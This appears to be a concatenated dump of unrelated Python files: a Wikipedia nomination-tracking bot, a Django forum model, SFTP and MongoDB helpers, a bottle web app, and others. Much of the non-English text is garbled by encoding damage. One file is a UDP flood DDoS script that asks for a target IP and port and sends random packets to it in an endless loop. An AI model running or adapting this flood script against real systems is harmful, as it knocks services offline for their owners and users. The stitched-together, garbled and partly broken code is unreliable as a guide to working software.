        if len(nonfinish_date_list) == 0:
            print("ะทะฐะบะพะฝัะธะปัั ัะฟะธัะพะบ")
            return
        print(nonfinish_date_list)
        date_str = nonfinish_date_list[cur_pos]
        if date_str == cur_date:
            is_last = True
        # Build the page title: "D month 20YY" from the ddmmyy string
        # ("2011" is a special legacy page name used as-is).
        if date_str == "2011":
            title_date = date_str
        else:
            d = date_str[:2]
            if d[0] == "0":
                d = d[1]
            title_date = d + " " + month_dic[date_str[2:4]] + " 20" + date_str[4:6]
        print(title_date + "\n")
        base_name = "ะะธะบะธะฟะตะดะธั:ะะฐะฝะดะธะดะฐัั ะฒ ะดะพะฑัะพัะฝัะต ััะฐััะธ/"
        page_name = base_name + title_date
        ed = editor.Editor(page_name)
        date_data = ed.get_text()
        if date_data is None:
            # No nomination page for this date: drop it and persist.
            print("no date page!")
            nonfinish_date_list.remove(date_str)
            work_dic["nonfinish_date_list"] = nonfinish_date_list
            pickle.dump(work_dic, open("good_data", "wb"))
            continue
        if date_str in work_dic:
            artdics_dic = work_dic[date_str]
        else:
            artdics_dic = {}
        is_done = True
        # Each "== ... [[Article]] ... ==" section is one nomination.
        date_art_list = re.findall("[^=]==[^=][^\[]*\[\[[^\]]+\]\][^=]*==[^=]", date_data)
        for i in range(0, len(date_art_list), 1):
            art = date_art_list[i]
            art_name = art[art.find("[[")+2:art.find("]]")]
            if art_name in artdics_dic:
                art_dic = artdics_dic[art_name]
                is_new = False
            else:
                art_dic = {}
                art_dic["name"] = art_name
                is_new = True
            print(art_name)
            # Slice this nomination's section out of the page text.
            tmp_data = date_data[date_data.find(art):]
            art_data = tmp_data
            try:
                art_data = tmp_data[:tmp_data.find(date_art_list[i+1])]
            except:
                pass
            if is_new:
                # First user-page link in the section is the nominator.
                nominator = ""
                for prefix in user_prefix:
                    try:
                        nominator = str(re.search("\[\["+prefix+":[^\|]+\|", art_data).group())[:-1]
                        nominator = nominator[nominator.find(":")+1:]
                    except:
                        pass
                    if nominator != "":
                        break
                if nominator == "":
                    nominator = "Unknown"
                art_dic["nominator"] = nominator
                nomdate = date_str
                art_dic["nomdate"] = nomdate
                print("ะะพะผะธะฝะฐัะธั: " + nominator + " - " + nomdate)
            # A closing ("verdict") subsection means the nomination is done.
            if art_data.find("=== ะัะพะณ ===") != -1:
                summ_data = art_data[art_data.find("=== ะัะพะณ ==="):]
                if summ_data.find("{{ะกะดะตะปะฐะฝะพ|ะกัะฐััั ะธะทะฑัะฐะฝะฐ}}") != -1:
                    summary = "good"
                elif summ_data.find("{{ะะต ัะดะตะปะฐะฝะพ|ะกัะฐััั ะฝะต ะธะทะฑัะฐะฝะฐ}}") != -1:
                    summary = "notgood"
                else:
                    summary = "Unknown"
                # First user-page link in the verdict is the closer.
                summator = ""
                for prefix in user_prefix:
                    try:
                        summator = str(re.search("\[\["+prefix+":[^\|]+\|", summ_data).group())[:-1]
                        summator = summator[summator.find(":")+1:]
                    except:
                        pass
                    if summator != "":
                        break
                if summator == "":
                    summator = "Unknown"
                # Parse the closing date out of the signature timestamp.
                tmp = re.search("\d\d:\d\d.*\(UTC\)", summ_data).group()
                tmp = re.search("[\d]+[ \w]+\d\d\d\d", tmp).group()
                d = re.search("[\d]+", tmp).group()
                if len(d) == 1:
                    d = "0" + d
                m = re.search("[^\d^\s]+", tmp).group()
                for key in month_dic:
                    if month_dic[key] == m:
                        m = key
                        break
                # NOTE(review): the year is hard-coded to "14" instead of
                # being taken from the parsed timestamp -- confirm intended.
                summdate = d + m + "14"
                print("ะะทะฑัะฐะฝะธะต: " + summator + " - " + summdate + " - " + summary)
            else:
                summary = ""
                summator = ""
                summdate = ""
            if summary == "":
                # At least one open nomination keeps the date unfinished.
                is_done = False
            art_dic["summary"] = summary
            art_dic["summator"] = summator
            art_dic["summdate"] = summdate
            # Current status template on the article itself:
            # n = no page, f/g/d = featured/good/decent, "" = none.
            ed = editor.Editor(art_name)
            art_text = ed.get_text()
            if art_text is None:
                art_curstate = "n"
            else:
                if art_text.find("ะะทะฑัะฐะฝะฝะฐั ััะฐััั") != -1:
                    art_curstate = "f"
                elif art_text.find("ะฅะพัะพัะฐั ััะฐััั") != -1:
                    art_curstate = "g"
                elif art_text.find("ะะพะฑัะพัะฝะฐั ััะฐััั") != -1:
                    art_curstate = "d"
                else:
                    art_curstate = ""
            art_dic["art_curstate"] = art_curstate
            print("ะจะฐะฑะปะพะฝ ะฒ ััะฐััะต: "+art_curstate)
            # Same check on the article's talk page.
            # NOTE(review): the first and third template markers below look
            # identical after the encoding damage in this dump -- if they are
            # truly equal the "d" branch is unreachable; verify originals.
            talk_name = "ะะฑััะถะดะตะฝะธะต:" + art_name
            ed = editor.Editor(talk_name)
            talk_text = ed.get_text()
            if talk_text is None:
                talk_curstate = "n"
            else:
                if talk_text.find("ะกะพะพะฑัะตะฝะธะต ะะก") != -1:
                    talk_curstate = "f"
                elif talk_text.find("ะกะพะพะฑัะตะฝะธะต ะฅะก") != -1:
                    talk_curstate = "g"
                elif talk_text.find("ะกะพะพะฑัะตะฝะธะต ะะก") != -1:
                    talk_curstate = "d"
                else:
                    talk_curstate = ""
            art_dic["talk_curstate"] = talk_curstate
            print("ะจะฐะฑะปะพะฝ ะฝะฐ ะกะ: "+talk_curstate)
            print(art_dic)
            artdics_dic[art_name] = art_dic
        work_dic[date_str] = artdics_dic
        if is_done:
            nonfinish_date_list.remove(date_str)
        else:
            cur_pos += 1
        # Persist progress after each date.
        work_dic["nonfinish_date_list"] = nonfinish_date_list
        pickle.dump(work_dic, open("good_data", "wb"))
def make_log():
    """
    Build a chronological wiki-markup log of closed nominations from the
    pickled "good_data" dict, print it together with counters, and (when the
    commented-out lines are enabled) publish it to the log page.
    """
    res_dic = {}
    # NOTE(review): doubled assignment left as-is; the second target is
    # redundant but harmless.
    work_dic = work_dic = pickle.load(open("good_data", "rb"))
    #print(work_dic)
    # Re-bucket every article record into year -> month -> day -> name.
    for date_str in work_dic:
        if date_str == "nonfinish_date_list":
            continue
        arts_dic = work_dic[date_str]
        for art_name in arts_dic:
            art_dic = arts_dic[art_name]
            status = art_dic["summary"]
            summator = art_dic["summator"]
            # NOTE(review): art_state is built but never stored -- dead code?
            art_state = {}
            art_state["name"] = art_name
            art_state["status"] = status
            art_state["summator"] = summator
            summdate = art_dic["summdate"]
            d = summdate[:2]
            m = summdate[2:4]
            y = summdate[4:]
            if y in res_dic:
                ydic = res_dic[y]
            else:
                ydic = {}
            if m in ydic:
                mdic = ydic[m]
            else:
                mdic = {}
            if d in mdic:
                ddic = mdic[d]
            else:
                ddic = {}
            ddic[art_name] = art_dic
            mdic[d] = ddic
            ydic[m] = mdic
            res_dic[y] = ydic
    #print(res_dic)
    # Walk the buckets in calendar order and emit one log line per article.
    good_count = 0
    cur_good_count = 0
    lines = ""
    for y in range(14, 20):
        if str(y) not in res_dic:
            continue
        else:
            ydic = res_dic[str(y)]
        for m in range(1, 13):
            sm = str(m)
            if len(sm) == 1:
                sm = "0" + sm
            if sm not in ydic:
                continue
            else:
                mdic = ydic[sm]
            for d in range(1, 32):
                sd = str(d)
                if len(sd) == 1:
                    sd = "0" + sd
                if sd not in mdic:
                    continue
                else:
                    ddic = mdic[sd]
                for art_name in ddic:
                    art_dic = ddic[art_name]
                    # Verdict -> wording; unknown verdicts count as promoted
                    # only when a current status template confirms it.
                    if art_dic["summary"] == "good":
                        stt = "ะธะทะฑัะฐะฝะฐ"
                        good_count += 1
                    elif art_dic["summary"] == "notgood":
                        stt = "ะพัะฟัะฐะฒะปะตะฝะฐ ะฝะฐ ะดะพัะฐะฑะพัะบั"
                    else:
                        if art_dic["art_curstate"] == "d" or art_dic["talk_curstate"] == "d":
                            stt = "ะธะทะฑัะฐะฝะฐ"
                            good_count += 1
                        else:
                            continue
                    if art_dic["art_curstate"] == "d":
                        cur_good_count += 1
                    lines += "# ะกัะฐััั [["+art_name+"]] "+stt+" ััะฐััะฝะธะบะพะผ [[u:"+art_dic["summator"]+"|"+art_dic["summator"]+"]] "+str(d)+" "+month_dic[sm]+" 20"+str(y)+"\n"
    print(lines)
    print("good: "+str(good_count))
    print("current good: "+str(cur_good_count))
    #ed = editor.Editor("ะะธะบะธะฟะตะดะธั:ะะฐะฝะดะธะดะฐัั ะฒ ะดะพะฑัะพัะฝัะต ััะฐััะธ/log")
    #ed.put_art(lines, "try again")
def first_run():
    """
    Seed the pickled "good_data" file: mark every date from 2013 to 2015
    (plus the legacy "2011" page) as unfinished so good_stater() will crawl
    them all.  Impossible calendar dates (e.g. Feb 31) are included on
    purpose -- good_stater() simply skips dates with no page.
    """
    work_dic = {}
    nonfinish_date_list = ["2011"]
    for y in range(13, 16):
        for m in range(1, 13):
            # Zero-pad month and day to build ddmmyy strings.
            strm = str(m)
            if len(strm) == 1:
                strm = "0" + strm
            for d in range(1, 32, 1):
                strd = str(d)
                if len(strd) == 1:
                    strd = "0" + strd
                date_str = strd + strm + str(y)
                nonfinish_date_list.append(date_str)
                print(date_str)
    work_dic["nonfinish_date_list"] = nonfinish_date_list
    pickle.dump(work_dic, open("good_data", "wb"))
12,917 | 0d22d51506bb43892619b48b30defdd31e2e7c55 | from setuptools import setup
# Package metadata for pytorch-cnn-visualization.
setup(
    name='pytorch-cnn-visualization',
    version='0.2.6',
    packages=['pytorch_cnn_visualization'],
    package_dir={'pytorch_cnn_visualization': 'pytorch_cnn_visualization'},
    # Ship bundled JSON data and helper scripts inside the package.
    package_data={'pytorch_cnn_visualization': ['data/*.json', 'misc_scripts/*.py']},
    license='MIT',
    description='Several CNN visualization implemented in Pytorch',
    long_description=open('README.md').read(),
    # NOTE(review): torch/torchvision are pinned to very old exact versions;
    # confirm these pins are still intended.
    install_requires=['torch==0.3.1', 'torchvision==0.2.0', 'scipy', 'matplotlib'],
    url='https://github.com/limyunkai19/pytorch-cnn-visualization',
    author='Lim Yun Kai',
    author_email='yunkai96@hotmail.com'
)
|
12,918 | d7cd1fe02ee4d72851cb18b4a8d92abb50a8b03a | # coding: utf8
import message
|
12,919 | 5459c3e800beef9d85bdcbb8bf6816c2cd72f10a | from django import forms
from .models import Articles
class PostForm(forms.ModelForm):
    """ModelForm for creating/editing an Articles entry."""

    class Meta:
        model = Articles
        # Only these fields are exposed to the user.
        fields = ('id_author','title','text',)
12,920 | 1fb335e081d5e6eddcf8087fb6b8a0ff7a6e2842 | """"mongodb client"""
from pymongo import MongoClient
MONGO_DB_HOST = 'localhost'
MONGO_DB_PORT = '27017' # default port
DB_NAME = 'tap-news' #database name which may connect many collection
# singelton client
client = MongoClient("%s:%s" %(MONGO_DB_HOST, MONGO_DB_PORT))
# if there is no argument,use the defualt DB_NAME
# Othewise, use the passed in argument
def get_db(db=DB_NAME):
    """Get a database instance from the shared singleton MongoClient.

    :param db: database name; defaults to DB_NAME when omitted.
    :return: the pymongo database handle.
    """
    db = client[db]  # reuse the module-level singleton connection
    return db
|
12,921 | 8d891269011998db94ec8da24aab3143daef2748 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class Forum(models.Model):
    """A top-level forum that groups discussion threads."""

    # Verbose name is Japanese ("put a short description here if the name
    # alone is unclear"); string reconstructed from the damaged dump bytes.
    title = models.CharField('ๅใใใซใใๅ ดๅใฏใใใซ่ชฌๆใๅฅใใ', max_length=60)

    def __unicode__(self):
        """
        String representation of the object (Python 2 __unicode__; on
        Python 3 this would become __str__).
        """
        return self.title

    def num_posts(self):
        """
        Return the total number of posts across all of this forum's threads.
        """
        return sum([t.num_posts() for t in self.thread_set.all()])

    def last_post(self):
        """
        Return the most recent Post in any of this forum's threads, or None.
        """
        # TODO: N+1 query pattern (one query per thread); needs fixing.
        if self.thread_set.count():
            last = None
            for t in self.thread_set.all():
                l = t.last_post()
                if l:
                    if not last or l.created > last.created:
                        last = l
            return last
class Thread(models.Model):
    """A discussion thread inside a Forum."""

    title = models.CharField(max_length=60)
    created = models.DateTimeField(auto_now_add=True)
    creator = models.ForeignKey(User, blank=True, null=True)
    forum = models.ForeignKey(Forum)

    class Meta(object):
        ordering = ['-created']  # newest threads first

    def __unicode__(self):
        return unicode(self.creator) + " - " + self.title

    def num_posts(self):
        """
        Return the number of posts attached to this thread.
        """
        return self.post_set.count()

    def num_replies(self):
        """
        Return the reply count: every post except the opening one,
        i.e. total posts minus 1.
        """
        return self.post_set.count() - 1

    def last_post(self):
        """
        Return the thread's last post (or None when the thread is empty).

        NOTE(review): order_by("created")[0] is ascending and thus yields
        the *oldest* post -- "-created" would yield the newest; confirm
        which is intended.
        """
        if self.post_set.count():
            return self.post_set.order_by("created")[0]
class Post(models.Model):
title = models.CharField(max_length=60)
created = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(User, blank=True, null=True)
thread = models.ForeignKey(Thread)
body = models.TextField(max_length=10000)
def __unicode__(self):
return u"%s - %s - %s" % (self.creator, self.thread, self.title)
def short(self):
"""
ๆฅไป
"""
return u"%s - %s\n%s" % (self.creator, self.title, self.created.strftime("%b %d, %I:%M %p"))
short.allow_tags = True
def profile_data(self):
p = self.creator.userprofile_set.all()[0]
# TODO avatar ใฎๆถใๅฟใใ
# ็นใซๅฝฑ้ฟใฏใชใใใใชใฎใงใจใใใใใฏไฟฎๆญฃใใชใใ
return p.posts, p.avatar
class UserProfile(models.Model):
posts = models.IntegerField(default=0)
user = models.ForeignKey(User, unique=True)
def __unicode__(self):
return unicode(self.user)
def create_user_profile(sender, **kwargs):
"""
ใฆใผใถไฝๆๅพใUserProfile ใไฝๆใใใ
"""
u = kwargs["instance"]
if not UserProfile.objects.filter(user=u):
UserProfile(user=u).save()
post_save.connect(create_user_profile, sender=User)
|
12,922 | cf1a04f763967f5d6d4be9c58f2f17116c9eeaee | import sys
import os
import time
import socket
import random
from datetime import datetime
datetime = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
os.system("clear")
os.system("DDoS Saldฤฑrฤฑsฤฑ Baลlatฤฑlฤฑyor")
print()
print("Fetih Tim Tarafฤฑndan")
print()
ip = raw_input("Karลฤฑ IP : ")
port = input("Port : ")
os.system("clear")
os.system("DDoS Baลlatฤฑlฤฑyor")
print("[ ] 0% ")
time.sleep(10)
print("[+++++ ] 25%")
time.sleep(10)
print("[++++++++++ ] 50%")
time.sleep(10)
print("[+++++++++++++++ ] 75%")
time.sleep(10)
print("[++++++++++++++++++++] 100%")
time.sleep(5)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print("%s Paketi รzerinden %s Portuna Gรถnderildi:%s" % (sent, ip, port))
if port == 65534:
port = 1
|
12,923 | bf313bc5df68de326970467a3418efad48089004 | import paramiko
import os
import stat
# ๅฎไนไธไธช็ฑป๏ผ่กจ็คบไธๅฐ่ฟ็ซฏlinuxไธปๆบ
class Linux(object):
# ้่ฟIP, ็จๆทๅ๏ผๅฏ็ ๏ผ่ถ
ๆถๆถ้ดๅๅงๅไธไธช่ฟ็จLinuxไธปๆบ
def __init__(self, ip, username, password, timeout=30):
self.ip = ip
self.username = username
self.password = password
self.timeout = timeout
# transportๅchanel
self.t = ''
self.sftp = ''
# ้พๆฅๅคฑ่ดฅ็้่ฏๆฌกๆฐ
self.try_times = 3
# ่ฐ็จ่ฏฅๆนๆณ่ฟๆฅ่ฟ็จไธปๆบ
def connect(self):
self.t = paramiko.Transport(sock=(self.ip, 22))
self.t.connect(username=self.username, password=self.password)
self.sftp = paramiko.SFTPClient.from_transport(self.t)
# ๆญๅผ่ฟๆฅ
def close(self):
self.t.close()
# ๅ้่ฆๆง่ก็ๅฝไปค
def send(self, cmd):
pass
# getๅไธชๆไปถ
def sftp_get(self, remotefile, localfile):
print(remotefile, " ==> ", localfile)
self.sftp.get(remotefile, localfile)
# putๅไธชๆไปถ
def sftp_put(self, localfile, remotefile):
print(localfile, " ==> ", remotefile)
self.sftp.put(localfile, remotefile)
def sftp_mkdir(self, remotedir):
try:
self.sftp.stat(os.path.dirname(remotedir))
except Exception as e:
self.sftp_mkdir(os.path.dirname(remotedir))
try:
self.sftp.stat(remotedir)
pass
except Exception as e:
print("mkdir ", remotedir)
self.sftp.mkdir(remotedir)
# put directory
def sftp_put_dir(self, localdir, remotedir):
for root, dirs, files in os.walk(localdir):
print("localdir = ", localdir)
print("remotedir = ", remotedir)
print("root = ", root)
remote_home = remotedir + \
root.replace(os.path.dirname(localdir), "").replace("\\", "/")
# print("remote_home = ", remote_home)
self.sftp_mkdir(remote_home.replace("\\", "/"))
# for dir in dirs:
# self.sftp_mkdir((remote_home + "/" + dir).replace("\\", "/"))
for file in files:
self.sftp_put(os.path.join(root, file),
(remote_home + "/" + file).replace("\\", "/"))
# get directory
def sftp_get_dir(self, remotedir, localdir):
for root, dirs, files in self.sftp_yield_walk(remotedir):
local_home = localdir + \
root.replace(os.path.dirname(remotedir), "").replace("/", "\\")
if not os.path.exists(local_home):
os.mkdir(local_home)
print("mkdir ", local_home)
for file in files:
self.sftp_get(root + '/' + file,
(local_home + "/" + file).replace("/", "\\"))
def sftp_get_walk(self, remotedir):
dirs = list()
files = list()
all_attrs = self.sftp.listdir_attr(remotedir)
for iter_attr in all_attrs:
if stat.S_ISDIR(iter_attr.st_mode):
dirs.append(iter_attr.filename)
else:
files.append(iter_attr.filename)
return (remotedir, dirs, files)
def sftp_resursion_walk(self, remotedir, all):
sub_root, sub_dirs, sub_files = self.sftp_get_walk(remotedir)
all.append((sub_root, sub_dirs, sub_files))
for sub_dir in sub_dirs:
real_sub_dir = remotedir + "/" + sub_dir
self.sftp_resursion_walk(real_sub_dir, all)
def sftp_walk(self, remotedir):
all = list()
self.sftp_resursion_walk(remotedir, all)
return all
def sftp_yield_walk(self, remotedir):
root, dirs, files = self.sftp_get_walk(remotedir)
yield (root, dirs, files)
for dir in dirs:
real_dir = remotedir + "/" + dir
yield self.sftp_get_walk(real_dir)
for sub_root, sub_dirs, sub_files in \
self.sftp_yield_walk(real_dir):
for sub_dir in sub_dirs:
real_subdir = sub_root + "/" + sub_dir
yield self.sftp_get_walk(real_subdir)
# removedๅไธชๆไปถ
def sftp_remove(self, remotefile):
self.sftp.remove(remotefile)
if __name__ == '__main__':
remote_dir = '/home/yuanwenxing/test'
local_dir = 'E:\code\python\sftp'
host = Linux('xxx', 'xxx', 'xxx')
host.connect()
# open file
# get
# HOME_DIR=r'/home/zhanghenan/source/trunk/'
# fp = open('sftp.INPUT')
# line = fp.readline()
# while(line):
# spLine = line[:-1].split(' ')
# tmpfrom = spLine[0]
# tmpto = HOME_DIR + spLine[1]
# host.sftp_get(tmpto, tmpfrom)
# line = fp.readline()
# put
# HOME_DIR=r'/home/yuanwenxing/XCloud/trunk/'
# fp = open('sftp.INPUT')
# line = fp.readline()
# while(line):
# spLine = line[:-1].split(' ')
# tmpfrom = spLine[0]
# tmpto = HOME_DIR + spLine[1]
# host.sftp_put(tmpfrom, tmpto)
# line = fp.readline()
# ๅฐ่ฟ็ซฏ็xxoo.txt getๅฐๆฌๅฐ๏ผๅนถไฟๅญไธบooxx.txt
# host.sftp_get(remotefile, localfile)
# # ๅฐๆฌๅฐ็xxoo.txt putๅฐ่ฟ็ซฏ๏ผๅนถไฟๆไธบxxoo.txt
# host.sftp_put("E:/code/python/stfp/test_sftp.py",
# "/home/hexianqing/john-y_tmp/abc")
# print(os.path.join(local_dir, "test_sftp.py"))
# print(os.path.join(remote_dir, "abc").replace("\\", "/"))
# host.sftp_mkdir(os.path.join(remote_dir, "bcd/bc").replace("\\", "/"))
# host.sftp_put_dir(local_dir, remote_dir)
# all = host.sftp_walk(remote_dir)
# print(all)
# for root, dirs, files in all:
# print(root)
# print(dirs)
# print(files)
host.sftp_get_dir(remote_dir, local_dir)
# for all in host.sftp_yield_walk(remote_dir):
# print(all)
# host.sftp_yield_walk(remote_dir)
host.close()
|
12,924 | 235236f7856b2cfed302c0eba6785a4a5d0073c0 | """
WSGI app.
"""
import datetime
import os
import time
import bottle
from web import data_proc
PASSPHRASE = os.urandom(2048)
class MainApp:
"""
The main WSGI web app.
"""
def __init__(self, database, timeslice, sample_rate, user, passwd):
self.app = bottle.Bottle()
self.database = database
self.timeslice = timeslice
self.sample_rate = sample_rate
self.user = user
self.passwd = passwd
self._route()
def _route(self):
"""
Setup routes.
"""
self.app.route('/', method="GET", callback=self._index_page)
self.app.route('/login', callback=self._login)
self.app.route('/login', callback=self._do_login, method='POST')
self.app.route('/static/<filename:path>', callback=self._static)
# TODO: add download
# TODO: add statistics.
def _check_login(self, user, pwd):
# FIXME: poor approach.
return user == self.user and pwd == self.passwd
@bottle.view('login.tmpl')
def _login(self):
return None
def _do_login(self):
username = bottle.request.forms.get('username')
password = bottle.request.forms.get('password')
if self._check_login(username, password):
bottle.response.set_cookie("account", username, secret=PASSPHRASE)
bottle.redirect("/")
else:
return "<p>Login failed.</p>"
@bottle.view('index.tmpl')
def _index_page(self):
username = bottle.request.get_cookie("account", secret=PASSPHRASE)
if username:
# FIXME: add more colors here :-)
colors = ['#95b143', '#444', '#95b143', '#444']
utcnow = datetime.datetime.utcnow()
end = time.mktime(utcnow.timetuple())
start = end - self.timeslice
data = data_proc.get_data(self.database,
start,
end,
self.sample_rate)
titles = []
datasets = {}
for key, val in data.items():
titles.append(key)
temp = val
data1 = {'labels': [str(x) for x in
temp.index.strftime('%H:%M:%S').tolist()],
'datasets': []}
i = 0
for column in list(temp):
series = {'label': str(column),
'data': temp[column].tolist(),
'fill': 'false',
'borderColor': colors[i]}
data1['datasets'].append(series)
i += 1
datasets[key] = data1
return {'titles': titles,
'datasets': datasets,
'time': str(datetime.datetime.fromtimestamp(end))}
return bottle.redirect("/login")
def _static(self, filename):
username = bottle.request.get_cookie("account", secret=PASSPHRASE)
if username:
return bottle.static_file(filename, root='views/static/')
elif filename == 'style.css':
return bottle.static_file(filename, root='views/static/')
return bottle.redirect("/login")
|
12,925 | 617e78f9d9bc8f2cd38d834fc80e56f311cc7843 |
add_2 = lambda x: x+2
add_3 = lambda x: x+3
add_5 = lambda x: x+5
add_7 = lambda x: x+7
add_11 = lambda x: x+11
|
12,926 | af0db16a504da2b275bea8b129472970aa55b212 | import numpy as np
import typing
class PoissonHist:
""" Binned data with symmetric Poisson error bars """
def __init__(self, data:typing.Iterable=None, lo=None, hi=None, nbins=100, dens=False, wght=None):
if data is not None:
lo = min(data) if lo is None else lo
hi = max(data) if hi is None else hi
self.data, edges = np.histogram(data, bins=nbins, range=(lo, hi), normed=dens, weights=wght)
self.bins = 0.5 * (edges[1:] + edges[:-1])
norm = self.data.sum() / data.sum()
self.errors = np.sqrt(self.data) * norm
@property
def nbins(self):
return self.data.size if hasattr(self, 'data') else None
@property
def num_entries(self):
return self.data.sum() if hasattr(self, 'data') else 0
@property
def bin_size(self):
return self.bins[1] - self.bins[0] if hasattr(self, 'bins') else None
def __add__(self, rhs):
assert isinstance(rhs, PoissonHist)
assert self.nbins == rhs.nbins
result = PoissonHist()
result.data = self.data + rhs.data
result.bins = self.bins
result.errors = np.sqrt(self.errors**2 + rhs.errors**2)
return result
def __sub__(self, rhs):
assert isinstance(rhs, PoissonHist)
assert self.nbins == rhs.nbins
result = PoissonHist()
result.data = self.data - rhs.data
result.bins = self.bins
result.errors = np.sqrt(self.errors**2 + rhs.errors**2)
return result
def plot_on(self, ax, label='', markersize=4):
ax.errorbar(self.bins, self.data, yerr=self.errors,
marker='o', linestyle='none', markersize=markersize, label=label)
|
12,927 | 21bfbe259d8f5bd948493d35a1de4781dff9120b | from django.db.models.signals import pre_save
from django.dispatch import receiver
from polls.models import Question
from polls.signals.senders import custom_signal
@receiver(pre_save, sender=Question)
def my_handler(sender, **kwargs):
print("pre_save handler called")
@receiver(custom_signal)
def my_custom_handler(sender, **kwargs):
print("custom_handler called") |
12,928 | 0a13c4cd3b7862d79e0e0cc2d0a1c2be62f20521 | from datetime import datetime
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from bluelog.extensions import db
class Admin(db.Model, UserMixin):
"""็ฎก็ๅ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20)) #
password_hash = db.Column(db.String(128)) # ๅฏ็ ๆฃๅๅผ
blog_title = db.Column(db.String(60)) # ๅๅฎขๆ ้ข
blog_sub_title = db.Column(db.String(100)) # ๅๅฎขๅฏๆ ้ข
name = db.Column(db.String(30)) # ็จๆทๅงๅ
about = db.Column(db.Text) # ๅ
ณไบไฟกๆฏ
def set_password(self, password):
"""ๅฏ็ ๅค็ๅ่ฟๅๅๅธๅผ่ตๅผ็ปๅฏ็ ๆฃๅๅผๅญๆฎต"""
self.password_hash = generate_password_hash(password)
def validate_password(self, password):
"""ๅฐๆฅๆถๅฐ็ๅฏ็ ็จๅฏ็ ๆฃๅๅผๆ ก้ช"""
return check_password_hash(self.password_hash, password)
class Category(db.Model):
"""ๅๆๆ ็ญพๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True) # ๅๆๆ ็ญพๅ็งฐ๏ผไธๅพ้ๅค
posts = db.relationship('Post', back_populates='category') # ๆๆ ็ญพๆ ็ญพๅๆ้๏ผๅๅๅผ็จcategoryๅปบ็ซๅๅๅ
ณ็ณป
def delete(self):
"""ๅ ้คๆ ็ญพ"""
default_category = Category.query.get(1) # ่ฟๅid=1็่ฎฐๅฝ ๏ผไธไธๆฒกๆid=1็ๆ ็ญพๅผๅช๏ผ
posts = self.posts[:] # ่ฟๅๅฝๅๅๆ้
for post in posts:
post.category = default_category
db.session.delete(self)
db.session.commit()
class Post(db.Model):
"""ๅๆ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(60)) # ๆ ้ข
body = db.Column(db.Text) # ๅๆๆญฃๆ
timestamp = db.Column(db.DateTime, default=datetime.utcnow, index=True) # ๅๆๆถ้ดๆณ
can_comment = db.Column(db.Boolean, default=True) # ๅฏๅฆ่ฏ่ฎบ๏ผ้ป่ฎคๅฏ
category_id = db.Column(db.Integer, db.ForeignKey('category.id')) # ๆ ็ญพid
category = db.relationship('Category', back_populates='posts') # ๅฏนๅๆๆ ็ญพ็ๅๅๅผ็จๅ
ณ็ณป
comments = db.relationship('Comment', back_populates='post', cascade='all, delete-orphan') # ๅฏน่ฏ่ฎบ็ๅๅๅผ็จๅ
ณ็ณป
class Comment(db.Model):
"""่ฏ่ฎบ็ฑป๏ผ้ๅ ๅๅค๏ผๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
author = db.Column(db.String(30)) # ไฝ่
email = db.Column(db.String(254)) # ไฝ่
็ตๅญ้ฎไปถ
site = db.Column(db.String(255)) # ไฝ่
็ซ็น
body = db.Column(db.Text) # ่ฏ่ฎบๆญฃๆ
from_admin = db.Column(db.Boolean, default=False) # ๆฏๅฆๆฅ่ช็ฎก็ๅ๏ผ้ป่ฎคไธๆฏ
reviewed = db.Column(db.Boolean, default=False) # ๆฏๅฆ้่ฟๅฎกๆ ธ๏ผ้ป่ฎคๆช้่ฟ
timestamp = db.Column(db.DateTime, default=datetime.utcnow, index=True) # ่ฏ่ฎบๆถ้ดๆณ
replied_id = db.Column(db.Integer, db.ForeignKey('comment.id')) # ๆๅ่ช่บซ็idๅญๆฎต
post_id = db.Column(db.Integer, db.ForeignKey('post.id')) # Postๅค้ฎ
post = db.relationship('Post', back_populates='comments') # ไธComment็ๅ
ณ็ณป
replies = db.relationship('Comment', back_populates='replied', cascade='all, delete-orphan') # ๅฏน่ฏ่ฎบ็ๅๅค้
replied = db.relationship('Comment', back_populates='replies', remote_side=[id]) # ๅฎไนidไธบ่ฟ็จ็ซฏ๏ผreplied_idไธบๆฌๅฐ็ซฏ
class Link(db.Model):
"""ๅค้จ้พๆฅ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30))
url = db.Column(db.String(255)) |
12,929 | 052aafb0a92274b39ca7eaaa251394391784839c | #!/usr/bin/env python
import os, os.path
import re
import sys
import yaml
def get_script_path():
return os.path.dirname(os.path.realpath(sys.argv[0]))
# Degrees of freedom
dof = sys.argv[1]
metrics_config_file = os.path.join(get_script_path(), 'anova_latex.yaml')
output_dir = 'formatted'
table_header = """
{{\centering
\\begin{{table}}[h]
{{\small
\\begin{{tabular}}{{|lrr||lrr|}}
& $F(3,{0})$ & $p$ & & $F(3,{0})$ & $p$ \\\\
\hline
"""
table_body = """
\multicolumn{{3}}{{|l||}}{{MR-CT-DA-}} & \multicolumn{{3}}{{|l|}}{{SR-CT-DA-}} \\\\
cl-s1 & ${0}$ & ${1}$ & cl-s1 & ${16}$ & ${17}$ \\\\
di-s1 & ${2}$ & ${3}$ & di-s1 & ${18}$ & ${19}$ \\\\
cl-s2 & ${4}$ & ${5}$ & cl-s2 & ${20}$ & ${21}$ \\\\
di-s2 & ${6}$ & ${7}$ & di-s2 & ${22}$ & ${23}$ \\\\
\hline
\multicolumn{{3}}{{|l||}}{{MR-IT-DA-}} & \multicolumn{{3}}{{|l|}}{{SR-IT-DA-}} \\\\
cl-s1 & ${8}$ & $ ${9}$ & cl-s1 & ${24}$ & ${25}$ \\\\
di-s1 & ${10}$ & ${11}$ & di-s1 & ${25}$ & ${27}$ \\\\
cl-s2 & ${12}$ & ${13}$ & cl-s2 & ${28}$ & ${29}$ \\\\
di-s2 & ${14}$ & ${15}$ & di-s2 & ${30}$ & ${31}$ \\\\
\hline
"""
table_footer = """
\end{{tabular}}
}}
\caption{{{0}}}
\label{{{1}}}
\end{{table}}
}}
